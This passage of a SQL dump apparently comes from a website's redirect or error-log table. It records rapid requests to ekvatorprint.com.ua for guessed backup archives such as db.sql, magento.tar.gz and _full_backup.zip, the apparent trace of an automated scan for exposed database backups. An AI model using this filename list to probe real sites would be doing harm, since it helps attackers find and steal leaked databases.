00:00:00',301),(21445,'https://ekvatorprint.com.ua/db.tar.gz',NULL,'','',1,0,'2022-03-23 11:18:11','0000-00-00 00:00:00',301),(21446,'https://ekvatorprint.com.ua/db.bz2',NULL,'','',5,0,'2022-03-23 11:18:11','0000-00-00 00:00:00',301),(21447,'https://ekvatorprint.com.ua/db.rar',NULL,'','',4,0,'2022-03-23 11:18:11','0000-00-00 00:00:00',301),(21448,'https://ekvatorprint.com.ua/db.bak',NULL,'','',5,0,'2022-03-23 11:18:12','0000-00-00 00:00:00',301),(21449,'https://ekvatorprint.com.ua/db.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:18:13','0000-00-00 00:00:00',301),(21450,'https://ekvatorprint.com.ua/db.7z',NULL,'','',7,0,'2022-03-23 11:18:14','0000-00-00 00:00:00',301),(21451,'https://ekvatorprint.com.ua/magento.sql',NULL,'','',1,0,'2022-03-23 11:18:14','0000-00-00 00:00:00',301),(21452,'https://ekvatorprint.com.ua/magento.tar',NULL,'','',1,0,'2022-03-23 11:18:15','0000-00-00 00:00:00',301),(21453,'https://ekvatorprint.com.ua/magento.tar.gz',NULL,'','',1,0,'2022-03-23 11:18:15','0000-00-00 00:00:00',301),(21454,'https://ekvatorprint.com.ua/magento.bz2',NULL,'','',1,0,'2022-03-23 11:18:15','0000-00-00 00:00:00',301),(21455,'https://ekvatorprint.com.ua/magento.rar',NULL,'','',2,0,'2022-03-23 11:18:15','0000-00-00 00:00:00',301),(21456,'https://ekvatorprint.com.ua/magento.bak',NULL,'','',1,0,'2022-03-23 11:18:16','0000-00-00 00:00:00',301),(21457,'https://ekvatorprint.com.ua/magento.zip',NULL,'','',1,0,'2022-03-23 11:18:16','0000-00-00 00:00:00',301),(21458,'https://ekvatorprint.com.ua/magento.sql.gz',NULL,'','',1,0,'2022-03-23 11:18:16','0000-00-00 00:00:00',301),(21459,'https://ekvatorprint.com.ua/magento.sql.zip',NULL,'','',1,0,'2022-03-23 11:18:16','0000-00-00 00:00:00',301),(21460,'https://ekvatorprint.com.ua/magento.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:18:17','0000-00-00 00:00:00',301),(21461,'https://ekvatorprint.com.ua/magento.sql.tar',NULL,'','',1,0,'2022-03-23 11:18:17','0000-00-00 00:00:00',301),(21462,'https://ekvatorprint.com.ua/magento.7z',NULL,'','',1,0,'2022-03-23 11:18:17','0000-00-00 00:00:00',301),(21463,'https://ekvatorprint.com.ua/magento.gz',NULL,'','',1,0,'2022-03-23 11:18:18','0000-00-00 00:00:00',301),(21464,'https://ekvatorprint.com.ua/test.sql',NULL,'','',1,0,'2022-03-23 11:18:18','0000-00-00 00:00:00',301),(21465,'https://ekvatorprint.com.ua/test.tar',NULL,'','',1,0,'2022-03-23 11:18:18','0000-00-00 00:00:00',301),(21466,'https://ekvatorprint.com.ua/test.bz2',NULL,'','',1,0,'2022-03-23 11:18:19','0000-00-00 00:00:00',301),(21467,'https://ekvatorprint.com.ua/test.rar',NULL,'','',2,0,'2022-03-23 11:18:19','0000-00-00 00:00:00',301),(21468,'https://ekvatorprint.com.ua/test.bak',NULL,'','',1,0,'2022-03-23 11:18:19','0000-00-00 00:00:00',301),(21469,'https://ekvatorprint.com.ua/test.sql.gz',NULL,'','',1,0,'2022-03-23 11:18:20','0000-00-00 00:00:00',301),(21470,'https://ekvatorprint.com.ua/test.sql.zip',NULL,'','',1,0,'2022-03-23 11:18:20','0000-00-00 00:00:00',301),(21471,'https://ekvatorprint.com.ua/test.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:18:20','0000-00-00 00:00:00',301),(21472,'https://ekvatorprint.com.ua/test.sql.tar',NULL,'','',1,0,'2022-03-23 11:18:21','0000-00-00 00:00:00',301),(21473,'https://ekvatorprint.com.ua/test.7z',NULL,'','',1,0,'2022-03-23 11:18:21','0000-00-00 00:00:00',301),(21474,'https://ekvatorprint.com.ua/test.gz',NULL,'','',1,0,'2022-03-23 11:18:21','0000-00-00 00:00:00',301),(21475,'https://ekvatorprint.com.ua/bkp.sql',NULL,'','',1,0,'2022-03-23 11:18:22','0000-00-00 00:00:00',301),(21476,'https://ekvatorprint.com.ua/bkp.tar',NULL,'','',1,0,'2022-03-23 11:18:22','0000-00-00 00:00:00',301),(21477,'https://ekvatorprint.com.ua/bkp.bz2',NULL,'','',1,0,'2022-03-23 11:18:23','0000-00-00 00:00:00',301),(21478,'https://ekvatorprint.com.ua/bkp.rar',NULL,'','',2,0,'2022-03-23 11:18:23','0000-00-00 00:00:00',301),(21479,'https://ekvatorprint.com.ua/bkp.bak',NULL,'','',1,0,'2022-03-23 11:18:23','0000-00-00 00:00:00',301),(21480,'https://ekvatorprint.com.ua/bkp.sql.gz',NULL,'','',1,0,'2022-03-23 11:18:24','0000-00-00 00:00:00',301),(21481,'https://ekvatorprint.com.ua/bkp.sql.zip',NULL,'','',1,0,'2022-03-23 11:18:24','0000-00-00 00:00:00',301),(21482,'https://ekvatorprint.com.ua/bkp.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:18:24','0000-00-00 00:00:00',301),(21483,'https://ekvatorprint.com.ua/bkp.sql.tar',NULL,'','',1,0,'2022-03-23 11:18:25','0000-00-00 00:00:00',301),(21484,'https://ekvatorprint.com.ua/bkp.7z',NULL,'','',1,0,'2022-03-23 11:18:25','0000-00-00 00:00:00',301),(21485,'https://ekvatorprint.com.ua/bkp.gz',NULL,'','',1,0,'2022-03-23 11:18:25','0000-00-00 00:00:00',301),(21486,'https://ekvatorprint.com.ua/new.sql',NULL,'','',1,0,'2022-03-23 11:18:26','0000-00-00 00:00:00',301),(21487,'https://ekvatorprint.com.ua/new.bz2',NULL,'','',1,0,'2022-03-23 11:18:26','0000-00-00 00:00:00',301),(21488,'https://ekvatorprint.com.ua/new.rar',NULL,'','',2,0,'2022-03-23 11:18:27','0000-00-00 00:00:00',301),(21489,'https://ekvatorprint.com.ua/new.bak',NULL,'','',1,0,'2022-03-23 11:18:27','0000-00-00 00:00:00',301),(21490,'https://ekvatorprint.com.ua/new.sql.gz',NULL,'','',1,0,'2022-03-23 11:18:28','0000-00-00 00:00:00',301),(21491,'https://ekvatorprint.com.ua/new.sql.zip',NULL,'','',1,0,'2022-03-23 11:18:28','0000-00-00 00:00:00',301),(21492,'https://ekvatorprint.com.ua/new.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:18:28','0000-00-00 00:00:00',301),(21493,'https://ekvatorprint.com.ua/new.sql.tar',NULL,'','',1,0,'2022-03-23 11:18:28','0000-00-00 00:00:00',301),(21494,'https://ekvatorprint.com.ua/new.7z',NULL,'','',1,0,'2022-03-23 11:18:29','0000-00-00 00:00:00',301),(21495,'https://ekvatorprint.com.ua/new.gz',NULL,'','',1,0,'2022-03-23 11:18:29','0000-00-00 00:00:00',301),(21496,'https://ekvatorprint.com.ua/old.sql',NULL,'','',1,0,'2022-03-23 11:18:29','0000-00-00 00:00:00',301),(21497,'https://ekvatorprint.com.ua/old.bz2',NULL,'','',1,0,'2022-03-23 11:18:30','0000-00-00 00:00:00',301),(21498,'https://ekvatorprint.com.ua/old.rar',NULL,'','',2,0,'2022-03-23 11:18:30','0000-00-00 00:00:00',301),(21499,'https://ekvatorprint.com.ua/old.bak',NULL,'','',1,0,'2022-03-23 11:18:30','0000-00-00 00:00:00',301),(21500,'https://ekvatorprint.com.ua/old.sql.gz',NULL,'','',1,0,'2022-03-23 11:18:31','0000-00-00 00:00:00',301),(21501,'https://ekvatorprint.com.ua/old.sql.zip',NULL,'','',1,0,'2022-03-23 11:18:31','0000-00-00 00:00:00',301),(21502,'https://ekvatorprint.com.ua/old.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:18:31','0000-00-00 00:00:00',301),(21503,'https://ekvatorprint.com.ua/old.sql.tar',NULL,'','',1,0,'2022-03-23 11:18:32','0000-00-00 00:00:00',301),(21504,'https://ekvatorprint.com.ua/old.7z',NULL,'','',1,0,'2022-03-23 11:18:32','0000-00-00 00:00:00',301),(21505,'https://ekvatorprint.com.ua/old.gz',NULL,'','',1,0,'2022-03-23 11:18:32','0000-00-00 00:00:00',301),(21506,'https://ekvatorprint.com.ua/files.sql',NULL,'','',1,0,'2022-03-23 11:18:33','0000-00-00 00:00:00',301),(21507,'https://ekvatorprint.com.ua/files.tar',NULL,'','',1,0,'2022-03-23 11:18:33','0000-00-00 00:00:00',301),(21508,'https://ekvatorprint.com.ua/files.tar.gz',NULL,'','',1,0,'2022-03-23 11:18:33','0000-00-00 00:00:00',301),(21509,'https://ekvatorprint.com.ua/files.bz2',NULL,'','',1,0,'2022-03-23 11:18:33','0000-00-00 00:00:00',301),(21510,'https://ekvatorprint.com.ua/files.rar',NULL,'','',2,0,'2022-03-23 11:18:34','0000-00-00 00:00:00',301),(21511,'https://ekvatorprint.com.ua/files.bak',NULL,'','',1,0,'2022-03-23 11:18:34','0000-00-00 00:00:00',301),(21512,'https://ekvatorprint.com.ua/files.zip',NULL,'','',1,0,'2022-03-23 11:18:34','0000-00-00 00:00:00',301),(21513,'https://ekvatorprint.com.ua/files.sql.gz',NULL,'','',1,0,'2022-03-23 11:18:34','0000-00-00 00:00:00',301),(21514,'https://ekvatorprint.com.ua/files.sql.zip',NULL,'','',1,0,'2022-03-23 11:18:35','0000-00-00 00:00:00',301),(21515,'https://ekvatorprint.com.ua/files.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:18:35','0000-00-00 00:00:00',301),(21516,'https://ekvatorprint.com.ua/files.sql.tar',NULL,'','',1,0,'2022-03-23 11:18:35','0000-00-00 00:00:00',301),(21517,'https://ekvatorprint.com.ua/files.7z',NULL,'','',1,0,'2022-03-23 11:18:36','0000-00-00 00:00:00',301),(21518,'https://ekvatorprint.com.ua/files.gz',NULL,'','',1,0,'2022-03-23 11:18:36','0000-00-00 00:00:00',301),(21519,'https://ekvatorprint.com.ua/fb.sql',NULL,'','',1,0,'2022-03-23 11:18:36','0000-00-00 00:00:00',301),(21520,'https://ekvatorprint.com.ua/fb.tar',NULL,'','',1,0,'2022-03-23 11:18:36','0000-00-00 00:00:00',301),(21521,'https://ekvatorprint.com.ua/fb.tar.gz',NULL,'','',1,0,'2022-03-23 11:18:37','0000-00-00 00:00:00',301),(21522,'https://ekvatorprint.com.ua/fb.bz2',NULL,'','',1,0,'2022-03-23 11:18:37','0000-00-00 00:00:00',301),(21523,'https://ekvatorprint.com.ua/fb.rar',NULL,'','',2,0,'2022-03-23 11:18:37','0000-00-00 00:00:00',301),(21524,'https://ekvatorprint.com.ua/fb.bak',NULL,'','',1,0,'2022-03-23 11:18:37','0000-00-00 00:00:00',301),(21525,'https://ekvatorprint.com.ua/fb.zip',NULL,'','',1,0,'2022-03-23 11:18:38','0000-00-00 00:00:00',301),(21526,'https://ekvatorprint.com.ua/fb.sql.gz',NULL,'','',1,0,'2022-03-23 11:18:38','0000-00-00 00:00:00',301),(21527,'https://ekvatorprint.com.ua/fb.sql.zip',NULL,'','',1,0,'2022-03-23 11:18:38','0000-00-00 00:00:00',301),(21528,'https://ekvatorprint.com.ua/fb.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:18:38','0000-00-00 00:00:00',301),(21529,'https://ekvatorprint.com.ua/fb.sql.tar',NULL,'','',1,0,'2022-03-23 11:18:39','0000-00-00 00:00:00',301),(21530,'https://ekvatorprint.com.ua/fb.7z',NULL,'','',1,0,'2022-03-23 11:18:39','0000-00-00 00:00:00',301),(21531,'https://ekvatorprint.com.ua/fb.gz',NULL,'','',1,0,'2022-03-23 11:18:39','0000-00-00 00:00:00',301),(21532,'https://ekvatorprint.com.ua/_backup.sql',NULL,'','',1,0,'2022-03-23 11:18:40','0000-00-00 00:00:00',301),(21533,'https://ekvatorprint.com.ua/_backup.tar',NULL,'','',1,0,'2022-03-23 11:18:40','0000-00-00 00:00:00',301),(21534,'https://ekvatorprint.com.ua/_backup.tar.gz',NULL,'','',1,0,'2022-03-23 11:18:40','0000-00-00 00:00:00',301),(21535,'https://ekvatorprint.com.ua/_backup.bz2',NULL,'','',1,0,'2022-03-23 11:18:40','0000-00-00 00:00:00',301),(21536,'https://ekvatorprint.com.ua/_backup.rar',NULL,'','',2,0,'2022-03-23 11:18:41','0000-00-00 00:00:00',301),(21537,'https://ekvatorprint.com.ua/_backup.bak',NULL,'','',1,0,'2022-03-23 11:18:41','0000-00-00 00:00:00',301),(21538,'https://ekvatorprint.com.ua/_backup.zip',NULL,'','',1,0,'2022-03-23 11:18:41','0000-00-00 00:00:00',301),(21539,'https://ekvatorprint.com.ua/_backup.sql.gz',NULL,'','',1,0,'2022-03-23 11:18:41','0000-00-00 00:00:00',301),(21540,'https://ekvatorprint.com.ua/_backup.sql.zip',NULL,'','',1,0,'2022-03-23 11:18:42','0000-00-00 00:00:00',301),(21541,'https://ekvatorprint.com.ua/_backup.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:18:42','0000-00-00 00:00:00',301),(21542,'https://ekvatorprint.com.ua/_backup.sql.tar',NULL,'','',1,0,'2022-03-23 11:18:42','0000-00-00 00:00:00',301),(21543,'https://ekvatorprint.com.ua/_backup.7z',NULL,'','',1,0,'2022-03-23 11:18:43','0000-00-00 00:00:00',301),(21544,'https://ekvatorprint.com.ua/_backup.gz',NULL,'','',1,0,'2022-03-23 11:18:43','0000-00-00 00:00:00',301),(21545,'https://ekvatorprint.com.ua/_backups.sql',NULL,'','',1,0,'2022-03-23 11:18:43','0000-00-00 00:00:00',301),(21546,'https://ekvatorprint.com.ua/_backups.tar',NULL,'','',1,0,'2022-03-23 11:18:43','0000-00-00 00:00:00',301),(21547,'https://ekvatorprint.com.ua/_backups.tar.gz',NULL,'','',1,0,'2022-03-23 11:18:44','0000-00-00 00:00:00',301),(21548,'https://ekvatorprint.com.ua/_backups.bz2',NULL,'','',1,0,'2022-03-23 11:18:44','0000-00-00 00:00:00',301),(21549,'https://ekvatorprint.com.ua/_backups.rar',NULL,'','',2,0,'2022-03-23 11:18:44','0000-00-00 00:00:00',301),(21550,'https://ekvatorprint.com.ua/_backups.bak',NULL,'','',1,0,'2022-03-23 11:18:44','0000-00-00 00:00:00',301),(21551,'https://ekvatorprint.com.ua/_backups.zip',NULL,'','',1,0,'2022-03-23 11:18:45','0000-00-00 00:00:00',301),(21552,'https://ekvatorprint.com.ua/_backups.sql.gz',NULL,'','',1,0,'2022-03-23 11:18:45','0000-00-00 00:00:00',301),(21553,'https://ekvatorprint.com.ua/_backups.sql.zip',NULL,'','',1,0,'2022-03-23 11:18:45','0000-00-00 00:00:00',301),(21554,'https://ekvatorprint.com.ua/_backups.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:18:45','0000-00-00 00:00:00',301),(21555,'https://ekvatorprint.com.ua/_backups.sql.tar',NULL,'','',1,0,'2022-03-23 11:18:46','0000-00-00 00:00:00',301),(21556,'https://ekvatorprint.com.ua/_backups.7z',NULL,'','',1,0,'2022-03-23 11:18:46','0000-00-00 00:00:00',301),(21557,'https://ekvatorprint.com.ua/_backups.gz',NULL,'','',1,0,'2022-03-23 11:18:46','0000-00-00 00:00:00',301),(21558,'https://ekvatorprint.com.ua/_backs.sql',NULL,'','',1,0,'2022-03-23 11:18:47','0000-00-00 00:00:00',301),(21559,'https://ekvatorprint.com.ua/_backs.tar',NULL,'','',1,0,'2022-03-23 11:18:47','0000-00-00 00:00:00',301),(21560,'https://ekvatorprint.com.ua/_backs.tar.gz',NULL,'','',1,0,'2022-03-23 11:18:47','0000-00-00 00:00:00',301),(21561,'https://ekvatorprint.com.ua/_backs.bz2',NULL,'','',1,0,'2022-03-23 11:18:48','0000-00-00 00:00:00',301),(21562,'https://ekvatorprint.com.ua/_backs.rar',NULL,'','',2,0,'2022-03-23 11:18:48','0000-00-00 00:00:00',301),(21563,'https://ekvatorprint.com.ua/_backs.bak',NULL,'','',1,0,'2022-03-23 11:18:48','0000-00-00 00:00:00',301),(21564,'https://ekvatorprint.com.ua/_backs.zip',NULL,'','',1,0,'2022-03-23 11:18:48','0000-00-00 00:00:00',301),(21565,'https://ekvatorprint.com.ua/_backs.sql.gz',NULL,'','',1,0,'2022-03-23 11:18:49','0000-00-00 00:00:00',301),(21566,'https://ekvatorprint.com.ua/_backs.sql.zip',NULL,'','',1,0,'2022-03-23 11:18:49','0000-00-00 00:00:00',301),(21567,'https://ekvatorprint.com.ua/_backs.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:18:49','0000-00-00 00:00:00',301),(21568,'https://ekvatorprint.com.ua/_backs.sql.tar',NULL,'','',1,0,'2022-03-23 11:18:49','0000-00-00 00:00:00',301),(21569,'https://ekvatorprint.com.ua/_backs.7z',NULL,'','',1,0,'2022-03-23 11:18:50','0000-00-00 00:00:00',301),(21570,'https://ekvatorprint.com.ua/_backs.gz',NULL,'','',1,0,'2022-03-23 11:18:50','0000-00-00 00:00:00',301),(21571,'https://ekvatorprint.com.ua/_back.sql',NULL,'','',1,0,'2022-03-23 11:18:50','0000-00-00 00:00:00',301),(21572,'https://ekvatorprint.com.ua/_back.tar',NULL,'','',1,0,'2022-03-23 11:18:51','0000-00-00 00:00:00',301),(21573,'https://ekvatorprint.com.ua/_back.tar.gz',NULL,'','',1,0,'2022-03-23 11:18:51','0000-00-00 00:00:00',301),(21574,'https://ekvatorprint.com.ua/_back.bz2',NULL,'','',1,0,'2022-03-23 11:18:51','0000-00-00 00:00:00',301),(21575,'https://ekvatorprint.com.ua/_back.rar',NULL,'','',2,0,'2022-03-23 11:18:51','0000-00-00 00:00:00',301),(21576,'https://ekvatorprint.com.ua/_back.bak',NULL,'','',1,0,'2022-03-23 11:18:52','0000-00-00 00:00:00',301),(21577,'https://ekvatorprint.com.ua/_back.zip',NULL,'','',1,0,'2022-03-23 11:18:52','0000-00-00 00:00:00',301),(21578,'https://ekvatorprint.com.ua/_back.sql.gz',NULL,'','',1,0,'2022-03-23 11:18:52','0000-00-00 00:00:00',301),(21579,'https://ekvatorprint.com.ua/_back.sql.zip',NULL,'','',1,0,'2022-03-23 11:18:53','0000-00-00 00:00:00',301),(21580,'https://ekvatorprint.com.ua/_back.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:18:53','0000-00-00 00:00:00',301),(21581,'https://ekvatorprint.com.ua/_back.sql.tar',NULL,'','',1,0,'2022-03-23 11:18:53','0000-00-00 00:00:00',301),(21582,'https://ekvatorprint.com.ua/_back.7z',NULL,'','',1,0,'2022-03-23 11:18:54','0000-00-00 00:00:00',301),(21583,'https://ekvatorprint.com.ua/_back.gz',NULL,'','',1,0,'2022-03-23 11:18:54','0000-00-00 00:00:00',301),(21584,'https://ekvatorprint.com.ua/_full_backup.sql',NULL,'','',1,0,'2022-03-23 11:18:54','0000-00-00 00:00:00',301),(21585,'https://ekvatorprint.com.ua/_full_backup.tar',NULL,'','',1,0,'2022-03-23 11:18:54','0000-00-00 00:00:00',301),(21586,'https://ekvatorprint.com.ua/_full_backup.tar.gz',NULL,'','',1,0,'2022-03-23 11:18:55','0000-00-00 00:00:00',301),(21587,'https://ekvatorprint.com.ua/_full_backup.bz2',NULL,'','',1,0,'2022-03-23 11:18:55','0000-00-00 00:00:00',301),(21588,'https://ekvatorprint.com.ua/_full_backup.rar',NULL,'','',2,0,'2022-03-23 11:18:55','0000-00-00 00:00:00',301),(21589,'https://ekvatorprint.com.ua/_full_backup.bak',NULL,'','',1,0,'2022-03-23 11:18:55','0000-00-00 00:00:00',301),(21590,'https://ekvatorprint.com.ua/_full_backup.zip',NULL,'','',1,0,'2022-03-23 11:18:56','0000-00-00 00:00:00',301),(21591,'https://ekvatorprint.com.ua/_full_backup.sql.gz',NULL,'','',1,0,'2022-03-23 11:18:56','0000-00-00 00:00:00',301),(21592,'https://ekvatorprint.com.ua/_full_backup.sql.zip',NULL,'','',1,0,'2022-03-23 11:18:56','0000-00-00 00:00:00',301),(21593,'https://ekvatorprint.com.ua/_full_backup.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:18:56','0000-00-00 00:00:00',301),(21594,'https://ekvatorprint.com.ua/_full_backup.sql.tar',NULL,'','',1,0,'2022-03-23 11:18:57','0000-00-00 00:00:00',301),(21595,'https://ekvatorprint.com.ua/_full_backup.7z',NULL,'','',1,0,'2022-03-23 11:18:57','0000-00-00 00:00:00',301),(21596,'https://ekvatorprint.com.ua/_full_backup.gz',NULL,'','',1,0,'2022-03-23 11:18:57','0000-00-00 00:00:00',301),(21597,'https://ekvatorprint.com.ua/_site_backup.sql',NULL,'','',1,0,'2022-03-23 11:18:58','0000-00-00 00:00:00',301),(21598,'https://ekvatorprint.com.ua/_site_backup.tar',NULL,'','',1,0,'2022-03-23 11:18:58','0000-00-00 00:00:00',301),(21599,'https://ekvatorprint.com.ua/_site_backup.tar.gz',NULL,'','',1,0,'2022-03-23 11:18:58','0000-00-00 00:00:00',301),(21600,'https://ekvatorprint.com.ua/_site_backup.bz2',NULL,'','',1,0,'2022-03-23 11:18:58','0000-00-00 00:00:00',301),(21601,'https://ekvatorprint.com.ua/_site_backup.rar',NULL,'','',2,0,'2022-03-23 11:18:59','0000-00-00 00:00:00',301),(21602,'https://ekvatorprint.com.ua/_site_backup.bak',NULL,'','',1,0,'2022-03-23 11:18:59','0000-00-00 00:00:00',301),(21603,'https://ekvatorprint.com.ua/_site_backup.zip',NULL,'','',1,0,'2022-03-23 11:18:59','0000-00-00 00:00:00',301),(21604,'https://ekvatorprint.com.ua/_site_backup.sql.gz',NULL,'','',1,0,'2022-03-23 11:18:59','0000-00-00 00:00:00',301),(21605,'https://ekvatorprint.com.ua/_site_backup.sql.zip',NULL,'','',1,0,'2022-03-23 11:19:00','0000-00-00 00:00:00',301),(21606,'https://ekvatorprint.com.ua/_site_backup.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:19:00','0000-00-00 00:00:00',301),(21607,'https://ekvatorprint.com.ua/_site_backup.sql.tar',NULL,'','',1,0,'2022-03-23 11:19:00','0000-00-00 00:00:00',301),(21608,'https://ekvatorprint.com.ua/_site_backup.7z',NULL,'','',1,0,'2022-03-23 11:19:01','0000-00-00 00:00:00',301),(21609,'https://ekvatorprint.com.ua/_site_backup.gz',NULL,'','',1,0,'2022-03-23 11:19:01','0000-00-00 00:00:00',301),(21610,'https://ekvatorprint.com.ua/site_backup_.sql',NULL,'','',1,0,'2022-03-23 11:19:01','0000-00-00 00:00:00',301),(21611,'https://ekvatorprint.com.ua/site_backup_.tar',NULL,'','',1,0,'2022-03-23 11:19:02','0000-00-00 00:00:00',301),(21612,'https://ekvatorprint.com.ua/site_backup_.tar.gz',NULL,'','',1,0,'2022-03-23 11:19:02','0000-00-00 00:00:00',301),(21613,'https://ekvatorprint.com.ua/site_backup_.bz2',NULL,'','',1,0,'2022-03-23 11:19:02','0000-00-00 00:00:00',301),(21614,'https://ekvatorprint.com.ua/site_backup_.rar',NULL,'','',2,0,'2022-03-23 11:19:02','0000-00-00 00:00:00',301),(21615,'https://ekvatorprint.com.ua/site_backup_.bak',NULL,'','',1,0,'2022-03-23 11:19:03','0000-00-00 00:00:00',301),(21616,'https://ekvatorprint.com.ua/site_backup_.zip',NULL,'','',1,0,'2022-03-23 11:19:03','0000-00-00 00:00:00',301),(21617,'https://ekvatorprint.com.ua/site_backup_.sql.gz',NULL,'','',1,0,'2022-03-23 11:19:03','0000-00-00 00:00:00',301),(21618,'https://ekvatorprint.com.ua/site_backup_.sql.zip',NULL,'','',1,0,'2022-03-23 11:19:04','0000-00-00 00:00:00',301),(21619,'https://ekvatorprint.com.ua/site_backup_.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:19:04','0000-00-00 00:00:00',301),(21620,'https://ekvatorprint.com.ua/site_backup_.sql.tar',NULL,'','',1,0,'2022-03-23 11:19:04','0000-00-00 00:00:00',301),(21621,'https://ekvatorprint.com.ua/site_backup_.7z',NULL,'','',1,0,'2022-03-23 11:19:05','0000-00-00 00:00:00',301),(21622,'https://ekvatorprint.com.ua/site_backup_.gz',NULL,'','',1,0,'2022-03-23 11:19:05','0000-00-00 00:00:00',301),(21623,'https://ekvatorprint.com.ua/_site.sql',NULL,'','',1,0,'2022-03-23 11:19:05','0000-00-00 00:00:00',301),(21624,'https://ekvatorprint.com.ua/_site.tar',NULL,'','',1,0,'2022-03-23 11:19:05','0000-00-00 00:00:00',301),(21625,'https://ekvatorprint.com.ua/_site.tar.gz',NULL,'','',1,0,'2022-03-23 11:19:06','0000-00-00 00:00:00',301),(21626,'https://ekvatorprint.com.ua/_site.bz2',NULL,'','',1,0,'2022-03-23 11:19:06','0000-00-00 00:00:00',301),(21627,'https://ekvatorprint.com.ua/_site.rar',NULL,'','',2,0,'2022-03-23 11:19:06','0000-00-00 00:00:00',301),(21628,'https://ekvatorprint.com.ua/_site.bak',NULL,'','',1,0,'2022-03-23 11:19:07','0000-00-00 00:00:00',301),(21629,'https://ekvatorprint.com.ua/_site.zip',NULL,'','',1,0,'2022-03-23 11:19:07','0000-00-00 00:00:00',301),(21630,'https://ekvatorprint.com.ua/_site.sql.gz',NULL,'','',1,0,'2022-03-23 11:19:07','0000-00-00 00:00:00',301),(21631,'https://ekvatorprint.com.ua/_site.sql.zip',NULL,'','',1,0,'2022-03-23 11:19:07','0000-00-00 00:00:00',301),(21632,'https://ekvatorprint.com.ua/_site.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:19:08','0000-00-00 00:00:00',301),(21633,'https://ekvatorprint.com.ua/_site.sql.tar',NULL,'','',1,0,'2022-03-23 11:19:08','0000-00-00 00:00:00',301),(21634,'https://ekvatorprint.com.ua/_site.7z',NULL,'','',1,0,'2022-03-23 11:19:08','0000-00-00 00:00:00',301),(21635,'https://ekvatorprint.com.ua/_site.gz',NULL,'','',1,0,'2022-03-23 11:19:09','0000-00-00 00:00:00',301),(21636,'https://ekvatorprint.com.ua/!backup.sql',NULL,'','',1,0,'2022-03-23 11:19:09','0000-00-00 00:00:00',301),(21637,'https://ekvatorprint.com.ua/!backup.tar',NULL,'','',1,0,'2022-03-23 11:19:09','0000-00-00 00:00:00',301),(21638,'https://ekvatorprint.com.ua/!backup.tar.gz',NULL,'','',1,0,'2022-03-23 11:19:09','0000-00-00 00:00:00',301),(21639,'https://ekvatorprint.com.ua/!backup.bz2',NULL,'','',1,0,'2022-03-23 11:19:10','0000-00-00 00:00:00',301),(21640,'https://ekvatorprint.com.ua/!backup.rar',NULL,'','',2,0,'2022-03-23 11:19:10','0000-00-00 00:00:00',301),(21641,'https://ekvatorprint.com.ua/!backup.bak',NULL,'','',1,0,'2022-03-23 11:19:10','0000-00-00 00:00:00',301),(21642,'https://ekvatorprint.com.ua/!backup.zip',NULL,'','',1,0,'2022-03-23 11:19:11','0000-00-00 00:00:00',301),(21643,'https://ekvatorprint.com.ua/!backup.sql.gz',NULL,'','',1,0,'2022-03-23 11:19:11','0000-00-00 00:00:00',301),(21644,'https://ekvatorprint.com.ua/!backup.sql.zip',NULL,'','',1,0,'2022-03-23 11:19:11','0000-00-00 00:00:00',301),(21645,'https://ekvatorprint.com.ua/!backup.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:19:11','0000-00-00 00:00:00',301),(21646,'https://ekvatorprint.com.ua/!backup.sql.tar',NULL,'','',1,0,'2022-03-23 11:19:12','0000-00-00 00:00:00',301),(21647,'https://ekvatorprint.com.ua/!backup.7z',NULL,'','',1,0,'2022-03-23 11:19:12','0000-00-00 00:00:00',301),(21648,'https://ekvatorprint.com.ua/!backup.gz',NULL,'','',1,0,'2022-03-23 11:19:13','0000-00-00 00:00:00',301),(21649,'https://ekvatorprint.com.ua/backup!.sql',NULL,'','',1,0,'2022-03-23 11:19:13','0000-00-00 00:00:00',301),(21650,'https://ekvatorprint.com.ua/backup!.tar',NULL,'','',1,0,'2022-03-23 11:19:13','0000-00-00 00:00:00',301),(21651,'https://ekvatorprint.com.ua/backup!.tar.gz',NULL,'','',1,0,'2022-03-23 11:19:13','0000-00-00 00:00:00',301),(21652,'https://ekvatorprint.com.ua/backup!.bz2',NULL,'','',1,0,'2022-03-23 11:19:14','0000-00-00 00:00:00',301),(21653,'https://ekvatorprint.com.ua/backup!.rar',NULL,'','',2,0,'2022-03-23 11:19:14','0000-00-00 00:00:00',301),(21654,'https://ekvatorprint.com.ua/backup!.bak',NULL,'','',1,0,'2022-03-23 11:19:15','0000-00-00 00:00:00',301),(21655,'https://ekvatorprint.com.ua/backup!.zip',NULL,'','',1,0,'2022-03-23 11:19:15','0000-00-00 00:00:00',301),(21656,'https://ekvatorprint.com.ua/backup!.sql.gz',NULL,'','',1,0,'2022-03-23 11:19:15','0000-00-00 00:00:00',301),(21657,'https://ekvatorprint.com.ua/backup!.sql.zip',NULL,'','',1,0,'2022-03-23 11:19:15','0000-00-00 00:00:00',301),(21658,'https://ekvatorprint.com.ua/backup!.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:19:16','0000-00-00 00:00:00',301),(21659,'https://ekvatorprint.com.ua/backup!.sql.tar',NULL,'','',1,0,'2022-03-23 11:19:16','0000-00-00 00:00:00',301),(21660,'https://ekvatorprint.com.ua/backup!.7z',NULL,'','',1,0,'2022-03-23 11:19:16','0000-00-00 00:00:00',301),(21661,'https://ekvatorprint.com.ua/backup!.gz',NULL,'','',1,0,'2022-03-23 11:19:17','0000-00-00 00:00:00',301),(21662,'https://ekvatorprint.com.ua/backup123.sql',NULL,'','',1,0,'2022-03-23 11:19:17','0000-00-00 00:00:00',301),(21663,'https://ekvatorprint.com.ua/backup123.tar',NULL,'','',1,0,'2022-03-23 11:19:17','0000-00-00 00:00:00',301),(21664,'https://ekvatorprint.com.ua/backup123.tar.gz',NULL,'','',1,0,'2022-03-23 11:19:18','0000-00-00 